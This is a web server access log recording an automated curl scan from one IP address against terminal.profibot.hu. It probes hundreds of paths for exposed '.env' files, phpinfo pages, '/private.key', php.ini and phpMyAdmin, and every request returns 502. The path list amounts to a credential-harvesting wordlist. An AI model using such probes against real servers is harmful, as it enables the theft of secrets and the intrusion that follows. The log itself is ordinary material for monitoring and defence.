[Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/memcached/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/mentorg-lava-docker/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/micro-app-react-communication/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/micro-app-react/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/mindsweeper/gui/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/minified/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/misc/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/Modix/ClientApp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/monerod/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/mongodb/config/dev/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/monitoring/compose/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/moodledata/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/msks/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/munki_repo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/music/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/MyRentals.Web/ClientApp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/mysql/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/name/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/nest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/netlify.toml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/new-js/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/new.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/news-app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/next/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/nginx-server/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/niffler-frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/node_modules/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/Nodejs-Projects/play-ground/login/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/Nodejs-Projects/play-ground/ManageUserRoles/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/noVNC/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/now.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/Nuke.App.Ui/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/nuxt/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/o.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/ocp.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/of.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/old/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/old/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/old_phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/old_site/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/oldsanta/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/opencart/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/ops/vagrant/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/option/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/orientdb-client/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/outputs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/owncloud/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/p.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/packages/styled-ui-docs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/packages/web/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/packed/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/page-editor/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/panel/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/parity/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/Passportjs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/patchwork/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/path/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:00 +0000] - - 502 - GET https terminal.profibot.hu "/pfbe/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/php.ini" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/php.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/php1.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/php52/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/php_info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpcustom_info/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.html" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php4" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.php5" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo1.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo2.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo3.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo4.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfodev.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfos.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpMyAdmin/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpmyadmin/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpsysinfo" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpsysinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpsysinfo/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpsysinfo/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpsysinfo/phpsysinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phptest.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/phpversion.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/pi.php5" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/pictures/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/platform/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/playground/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/plugin_static/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/plugins/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/post-deployment/.vscode/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/postfixadmin/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/prestashop/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/preview-env/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:01 +0000] - - 502 - GET https terminal.profibot.hu "/preview/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/price_hawk_client/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/prisma/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/private.key" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/processor/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/Procfile" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/prod/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/product/.env.staging" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/projbackend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/project/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/project_root/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/protected/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/psnlink/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/pt2/countries/src/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/pt8/library-backend-gql/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/pub/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/public/system" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/public_html/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/public_root/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/q.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/qq.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/question2/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/qv-frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/rabbitmq-cluster/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/rails-api/react-app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/rails/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/rasax/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/react/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/react_todo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/redmine/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/repo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/repos/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/repository/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/resources/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/resources/docker/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/resources/docker/mysql/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/resources/docker/phpmyadmin/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/resources/docker/rabbitmq/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:02 +0000] - - 502 - GET https terminal.profibot.hu "/resources/docker/rediscommander/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/resourcesync/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/rest.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/rest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/restapi/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/results/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/robots.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/robots/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/rollup.config.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/root/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/rosterBack/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/roundcube/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/roundcubemail/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/routes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/run/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/rust-backend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" 